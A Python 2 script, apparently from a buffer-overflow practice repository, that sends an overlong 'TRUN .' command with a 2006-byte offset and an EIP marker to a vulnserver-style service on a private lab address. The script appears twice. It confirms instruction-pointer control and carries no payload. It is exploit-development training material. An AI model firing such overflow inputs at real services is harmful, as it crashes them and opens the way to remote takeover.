whichbuffer/vs-eip2.py

## vs-eip2.py
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

prefix = 'A' * 2006
eip = 'BCDE'
padding = 'F' * (3000 - 2006 - 4)
attack = prefix + eip + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
	#!/usr/bin/python
	import socket
	server = '192.168.119.129'
	sport = 9999

	prefix = 'A' * 2006
	eip = 'BCDE'
	padding = 'F' * (3000 - 2006 - 4)
	attack = prefix + eip + padding

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect = s.connect((server, sport))
	print s.recv(1024)
	print "Sending attack to TRUN . with length ", len(attack)
	s.send(('TRUN .' + attack + '\r\n'))
	print s.recv(1024)
	s.send('EXIT\r\n')
	print s.recv(1024)
	s.close()